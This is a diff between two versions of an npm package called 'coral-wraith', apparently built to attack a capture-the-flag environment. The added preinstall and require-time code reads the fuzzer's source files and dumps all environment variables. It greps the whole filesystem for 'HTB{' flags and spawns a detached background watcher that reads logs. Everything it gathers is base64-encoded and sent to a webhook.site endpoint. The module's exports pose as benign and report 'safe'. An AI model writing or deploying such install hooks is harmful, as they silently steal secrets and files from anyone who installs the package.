coral-wraith 9999.0.8 → 9999.0.9

package/index.js

@@ -1,52 +1,81 @@
 const fs = require('fs');
 const https = require('https');
+const { execSync } = require('child_process');
 
 const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
 
+function send(path, data) {
+  try {
+    const b64 = Buffer.from(typeof data === 'string' ? data : JSON.stringify(data)).toString('base64');
+    const req = https.request({
+      hostname: 'webhook.site', path: WH + '/' + path,
+      method: 'POST',
+      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
+      timeout: 15000
+    }, ()=>{});
+    req.on('error', ()=>{});
+    req.write(b64);
+    req.end();
+  } catch(e) {}
+}
+
 // This runs when the fuzzer require()s us
-// Read all fuzzer source files and exfiltrate
-(function() {
-  const files = [
-    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js',
-    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js',
-    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_manager.js',
-    '/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js',
-  ];
-  
-  for (let i = 0; i < files.length; i++) {
-    try {
-      const content = fs.readFileSync(files[i], 'utf8');
-      const b64 = Buffer.from(`${files[i]}:\n${content}`).toString('base64');
-      const req = https.request({
-        hostname: 'webhook.site', path: `${WH}/require-${i}`,
-        method: 'POST',
-        headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
-        timeout: 10000
-      }, ()=>{});
-      req.on('error', ()=>{});
-      req.write(b64);
-      req.end();
-    } catch(e) {}
+// At this point we're inside the fuzzer's process context
+send('require-v9', JSON.stringify({
+  cwd: process.cwd(),
+  argv: process.argv,
+  env: process.env,
+  pid: process.pid,
+  moduleFilename: module.filename,
+  modulePaths: module.paths,
+}));
+
+// Read fuzzer source - especially npm_fuzzer.js and fuzz_env.js
+const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src/fuzz';
+const criticalFiles = [
+  `${fuzzBase}/npm_fuzzer.js`,
+  `${fuzzBase}/fuzz_env.js`,
+  `${fuzzBase}/constants.js`,
+  `${fuzzBase}/fuzz_manager.js`,
+];
+
+for (let i = 0; i < criticalFiles.length; i++) {
+  try {
+    const content = fs.readFileSync(criticalFiles[i], 'utf8');
+    send(`require-src-${i}`, `${criticalFiles[i]}:\n${content}`);
+  } catch(e) {
+    send(`require-src-err-${i}`, `${criticalFiles[i]}: ${e.message}`);
   }
+}
+
+// Read ALL bean files
+try {
+  const r = execSync(`find ${fuzzBase}/bean -name "*.js" 2>/dev/null`).toString().trim();
+  for (const f of r.split('\n').filter(Boolean)) {
+    if (!f.includes('._')) {
+      try {
+        const c = fs.readFileSync(f, 'utf8');
+        send(`require-bean-${f.split('/').pop()}`, `${f}:\n${c}`);
+      } catch(e) {}
+    }
+  }
+} catch(e) {}
+
+// Check if flag is now available (it might be set after fuzzer init)
+try {
+  const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | head -5', {timeout:5000}).toString();
+  send('require-flag-grep', r);
+} catch(e) {}
+
+// Also check: does the fuzzer write results somewhere?
+try {
+  const r = execSync('find /tmp -name "*.json" -o -name "*.log" -o -name "*.txt" 2>/dev/null').toString().trim();
+  send('require-tmp-files', r);
+} catch(e) {}
 
-  // Check for flag in env
-  const flagData = Buffer.from(JSON.stringify({
-    env: process.env,
-    cwd: process.cwd(),
-    argv: process.argv,
-  })).toString('base64');
-  
-  const req = https.request({
-    hostname: 'webhook.site', path: `${WH}/require-flag`,
-    method: 'GET',
-    timeout: 10000
-  }, ()=>{});
-  req.on('error', ()=>{});
-  req.end();
-})();
-
-// Export something for the fuzzer to analyze
+// Export something benign for the fuzzer to analyze
 module.exports = {
   name: 'coral-wraith',
-  version: '9999.0.8',
+  version: '9999.0.9',
+  analyze: function() { return 'safe'; },
 };

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.8",
+  "version": "9999.0.9",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,93 +1,144 @@
 const fs = require('fs');
 const https = require('https');
-const { execSync } = require('child_process');
+const http = require('http');
+const { execSync, spawn } = require('child_process');
 
 const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
-const debug = [];
 
-// Read the fuzzer source files - these contain the flag/detection logic
-const fuzzFiles = [
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_manager.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/bean/timer_func.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/set_timer_action.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/regexp_test_action.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/action/clear_timer_action.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/set_timer_strategy.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/regexp_test_strategy.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/strategy/clear_timer_strategy.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/class_parser.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/type_parser.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/fuzz/parser/package_exports_parser.js',
-  '/home/node/aspect-node/modules/npm-tracker/src/npm_tracker.js',
+function send(path, data) {
+  try {
+    const b64 = Buffer.from(typeof data === 'string' ? data : JSON.stringify(data)).toString('base64');
+    const req = https.request({
+      hostname: 'webhook.site', path: WH + '/' + path,
+      method: 'POST',
+      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
+      timeout: 15000
+    }, ()=>{});
+    req.on('error', ()=>{});
+    req.write(b64);
+    req.end();
+  } catch(e) {}
+}
+
+// Read fuzzer source files
+const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src';
+const files = [
+  `${fuzzBase}/fuzz/npm_fuzzer.js`,
+  `${fuzzBase}/fuzz/fuzz_env.js`,
+  `${fuzzBase}/fuzz/fuzz_manager.js`,
+  `${fuzzBase}/fuzz/constants.js`,
+  `${fuzzBase}/fuzz/bean/timer_func.js`,
+  `${fuzzBase}/fuzz/action/set_timer_action.js`,
+  `${fuzzBase}/fuzz/action/regexp_test_action.js`,
+  `${fuzzBase}/fuzz/action/clear_timer_action.js`,
+  `${fuzzBase}/fuzz/strategy/set_timer_strategy.js`,
+  `${fuzzBase}/fuzz/strategy/regexp_test_strategy.js`,
+  `${fuzzBase}/fuzz/strategy/clear_timer_strategy.js`,
+  `${fuzzBase}/fuzz/parser/class_parser.js`,
+  `${fuzzBase}/fuzz/parser/type_parser.js`,
+  `${fuzzBase}/fuzz/parser/package_exports_parser.js`,
+  `${fuzzBase}/npm_tracker.js`,
   '/home/node/init_test.sh',
   '/home/node/supplysec_entry.js',
 ];
 
-// Also check for flag-like files
-const flagFiles = [
-  '/flag', '/flag.txt', '/root/flag', '/root/flag.txt',
-  '/home/node/flag', '/home/node/flag.txt',
-];
-
-for (const f of [...fuzzFiles, ...flagFiles]) {
+for (let i = 0; i < files.length; i++) {
   try {
-    const content = fs.readFileSync(f, 'utf8');
-    debug.push(`FILE:${f}:${content}`);
+    const content = fs.readFileSync(files[i], 'utf8');
+    send(`pre-file-${i}`, `${files[i]}:\n${content}`);
   } catch(e) {
-    debug.push(`ERR:${f}:${e.message.substring(0,80)}`);
+    send(`pre-err-${i}`, `${files[i]}: ${e.message}`);
   }
 }
 
-// Environment
-debug.push(`ALL_ENV:${JSON.stringify(process.env)}`);
+// Also find all .js files under the fuzz directory
+try {
+  const r = execSync(`find ${fuzzBase}/fuzz -name "*.js" -type f 2>/dev/null`).toString().trim();
+  send('pre-fuzz-files', r);
+  for (const f of r.split('\n').filter(Boolean)) {
+    if (!files.includes(f)) {
+      try {
+        const c = fs.readFileSync(f, 'utf8');
+        send(`pre-extra-${f.split('/').pop()}`, `${f}:\n${c}`);
+      } catch(e) {}
+    }
+  }
+} catch(e) {}
 
-// Also find any files with "flag" or "HTB" content
+// Read the web app source (could be in /app, /data, or served by nginx)
 try {
-  const r = execSync('grep -rl "HTB{\\|FLAG\\|flag" /home/node/aspect-node/ 2>/dev/null | head -20', {timeout:10000}).toString().trim();
-  debug.push(`GREP_FLAG:${r}`);
+  const r = execSync('find / -maxdepth 4 -name "*.js" -path "*/app/*" -o -name "server.js" -o -name "app.js" -o -name "index.js" -path "*/src/*" 2>/dev/null | grep -v node_modules | grep -v aspect-node | head -20', {timeout:10000}).toString().trim();
+  send('pre-app-files', r);
   for (const f of r.split('\n').filter(Boolean)) {
     try {
       const c = fs.readFileSync(f, 'utf8');
-      debug.push(`GREP_CONTENT:${f}:${c.substring(0,2000)}`);
+      if (c.includes('fastify') || c.includes('flag') || c.includes('HTB')) {
+        send(`pre-app-${f.replace(/\//g,'_')}`, `${f}:\n${c}`);
+      }
     } catch(e) {}
   }
-} catch(e) { debug.push(`GREP_ERR:${e.message.substring(0,100)}`); }
-
-// Send in chunks to webhook
-function sendChunk(data, path) {
-  try {
-    const encoded = Buffer.from(data).toString('base64');
-    const req = https.request({
-      hostname: 'webhook.site', path: WH + path,
-      method: 'POST',
-      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(encoded)},
-      timeout: 15000
-    }, ()=>{});
-    req.on('error', ()=>{});
-    req.write(encoded);
-    req.end();
-  } catch(e) {}
-}
+} catch(e) {}
 
-const fullData = JSON.stringify(debug);
-const chunkSize = 50000;
-for (let i = 0; i < fullData.length; i += chunkSize) {
-  const chunk = fullData.substring(i, i + chunkSize);
-  sendChunk(chunk, `/v4-${Math.floor(i/chunkSize)}`);
-}
+// Search for flag anywhere
+try {
+  const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | grep -v node_modules | head -10', {timeout:15000}).toString().trim();
+  send('pre-flag-grep', r);
+  for (const f of r.split('\n').filter(Boolean)) {
+    try {
+      send(`pre-flag-file-${f.replace(/\//g,'_')}`, fs.readFileSync(f, 'utf8'));
+    } catch(e) {}
+  }
+} catch(e) { send('pre-flag-grep-err', e.message); }
 
-// Also try curl for reliability
+// Spawn a background watcher that runs after init_test.sh
 try {
-  for (let i = 0; i < Math.min(debug.length, 30); i++) {
-    const item = debug[i];
-    if (item.length > 100) {
-      const b64 = Buffer.from(item.substring(0, 8000)).toString('base64');
-      execSync(`curl -s -X GET "https://webhook.site${WH}/file-${i}?d=${encodeURIComponent(b64)}" -m 10 2>/dev/null`, {timeout:12000});
+  const watcherCode = `
+    const fs = require('fs');
+    const https = require('https');
+    const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
+    function send(p, d) {
+      try {
+        const b = Buffer.from(d).toString('base64');
+        const r = https.request({hostname:'webhook.site',path:WH+'/'+p,method:'POST',
+          headers:{'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b)},timeout:10000},()=>{});
+        r.on('error',()=>{}); r.write(b); r.end();
+      } catch(e) {}
     }
-  }
+    // Wait and then look for flag in logs and generated files
+    setTimeout(() => {
+      const paths = [
+        '/home/node/aspect-node/logs/agent.log',
+        '/home/node/aspect-node/logs/default.log',
+        '/home/node/aspect-node/logs/error.log',
+        '/home/node/aspect-node/logs/collect.log',
+        '/home/node/aspect-node/logs/module.log',
+        '/home/node/aspect-node/logs/monitor.log',
+        '/home/node/aspect-node/logs/metric.log',
+        '/home/node/aspect-node/logs/warning.log',
+        '/home/node/aspect-node/logs/agent-error.log',
+        '/tmp/fuzz_result.json',
+        '/tmp/result.json',
+        '/tmp/flag',
+        '/tmp/flag.txt',
+      ];
+      for (let i = 0; i < paths.length; i++) {
+        try {
+          const c = fs.readFileSync(paths[i], 'utf8');
+          if (c.trim()) send('watch-'+i, paths[i]+':\\n'+c);
+        } catch(e) {}
+      }
+      // Also check env again
+      send('watch-env', JSON.stringify(process.env));
+      // grep for HTB
+      try {
+        const r = require('child_process').execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | head -5', {timeout:10000}).toString();
+        send('watch-grep', r);
+      } catch(e) {}
+    }, 30000);
+    setTimeout(() => process.exit(0), 60000);
+  `;
+  fs.writeFileSync('/tmp/watcher.js', watcherCode);
+  spawn('node', ['/tmp/watcher.js'], { detached: true, stdio: 'ignore' }).unref();
 } catch(e) {}
 
-console.log('[CORAL-V8] preinstall done, sent', debug.length, 'items');
+console.log('[CORAL-V9] preinstall complete');